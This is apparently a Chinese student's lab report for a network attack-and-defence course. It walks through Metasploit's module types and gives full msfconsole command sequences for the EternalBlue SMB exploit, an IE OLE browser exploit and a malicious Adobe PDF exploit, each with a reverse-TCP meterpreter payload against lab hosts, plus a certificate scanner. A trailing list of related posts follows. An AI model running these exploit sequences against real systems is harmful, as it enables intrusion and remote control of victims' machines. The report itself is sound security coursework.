1.实验目的

  • 掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路

2.实验内容

  • 一个主动攻击实践; (1分)

    MS17-010
  • 一个针对浏览器的攻击;(1分)

    ms14_064
  • 一个针对客户端的攻击,如Adobe;(1分)

    exploit/windows/fileformat/adobe_utilprintf
  • 成功应用任何一个辅助模块。(0.5分)

    auxiliary/scanner/http/cert(唯一)

3.基础问题回答

  • 用自己的话解释什么是exploit,payload,encode

    exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到攻击的最终目的

    payload:攻击载荷,在它传到靶机中后执行相应的代码

    encode:编码器

4.预备知识

  • Exploit模块

    是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。

    形象点来说就是攻击模块

  • Payload模块

    是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。

  • Encoder模块

    针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征

    不改变payload作用,但能对payload进行加工

  • Aux模块

    能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。

    主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。

  • Post模块

    支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。

    这里主要指的是攻击之后可能用到的模块

  • Nops模块

    是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90

    因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置

5.实验步骤

任务一--Windows服务渗透攻击——MS17-010安全漏洞

  • 打开MSF输入nmap -O -Pn 192.168.80.133

  • 利用auxiliary辅助模块进行扫描

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.80.133
run

  • 根据要求设置并攻击

    输入back退回,然后依次输入
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.80.132
set RHOST 192.168.80.133
exploit

任务二--浏览器漏洞攻击/ms14_064

  • 使用模块并配置模块

    nmap --script=vuln 192.168.80.135

    use windows/browser/ms14_064_ole_code_execution

    set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.80.132

    run
  • windows xp打开网站

任务三--针对客户端的攻击/在win sp3环境下使用 exploit/windows/fileformat/adobe_utilprintf 模块

  • 首先,先配置模块需要的参数

    use exploit/windows/fileformat/adobe_utilprintf

    set payload windows/meterpreter/reverse_tcp

    set RHOSTS 192.168.80.135

    run

  • 设立监视模块

  • windows xp中运行pdf

  • 发现获取到了shell

任务四--辅助模块cert(该“cert”的扫描仪模块是一个有用的管理扫描仪,使您可以覆盖一个子网来检查服务器证书是否过期)

use auxiliary/scanner/http/cert

show options

set RHOSTS 192.168.1.0/24

set THREADS 254

run

实验收获

通过这次试验我更加深刻的了解到了本课程的内容,通过本次实践我学会了msf中模块的使用以及对客户端和浏览器等漏洞进行攻击的方法和步骤,网络攻防这门课程就是一门用来实践的课程,理论和实践必须要紧密结合,要想学好这门课程最重要的就是多动手,在以后的实验中我会更认真的不断在探索中理解体会这门课程!

2018-2019-2 20165302 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  5. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  6. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  7. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  8. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  9. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

随机推荐

  1. 盐水的故事(hdu1408)

    盐水的故事 Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) Total Subm ...

  2. 卡片游戏(hdu4550)贪心

    卡片游戏 Time Limit: 3000/1000 MS (Java/Others)    Memory Limit: 65535/32768 K (Java/Others) Total Submi ...

  3. Android - AMS源码分析

    Android核心分析之AMS App和AMS(SystemServer进程)还有zygote进程分属于三个独立的进程 App与AMS通过Binder进行IPC通信,AMS(SystemServer进 ...

  4. Textview源码+绘制过程解析

    Android控件TextView的实现原理分析 为什么要规定所有与UI相关的操作都必须在主线程中执行呢?我们知道,这些与UI相关的操作都涉及到大量的控件内部状态以及需要访问窗口的绘图表面,也就是说, ...

  5. Three.js开发指南---使用three.js的材质(第四章)

    材质就像物体的皮肤,决定了几何体的外表,例如是否像草地/金属,是否透明,是否显示线框等 一 材质 THREE.js的材质分为多种,Three.js提供了一个材质基类THREE.Material, 该基 ...

  6. POJ3281(KB11-B 最大流)

    Dining Time Limit: 2000MS   Memory Limit: 65536K Total Submissions: 19170   Accepted: 8554 Descripti ...

  7. 学习html/css基础的重点笔记

    1.权重问题 内联样式表 > id选择符 > class选择符 > 类型选择符(所有html标签名称) 内联样式表 > 内部样式表.外部样式表 内部样式表.外部样式表的权重与书 ...

  8. Bootstrap4响应式布局之栅格系统

    前面说了Bootstrap4的下载和简单使用,现在我们接着往下学习,Bootstrap4的响应式布局主要依靠栅格系统来实现的.面老K先来讲解一下Bootstrap4的栅格系统,让你能够更快的了解Boo ...

  9. page、request、session和application有什么区别?

    转自:http://liuyuru.iteye.com/blog/773367 1.简单说 page指当前页面.在一个jsp页面里有效 2.request 指从http请求到服务器处理结束,返回响应的 ...

  10. jQuery中hover方法和toggle方法使用指南

    jQuery提供一些方法(如:toggle)将两种事件效果合并到一起,比如:mouseover.mouseout:keyup.keydown等 1.hover函数 hover(over,out)一个模 ...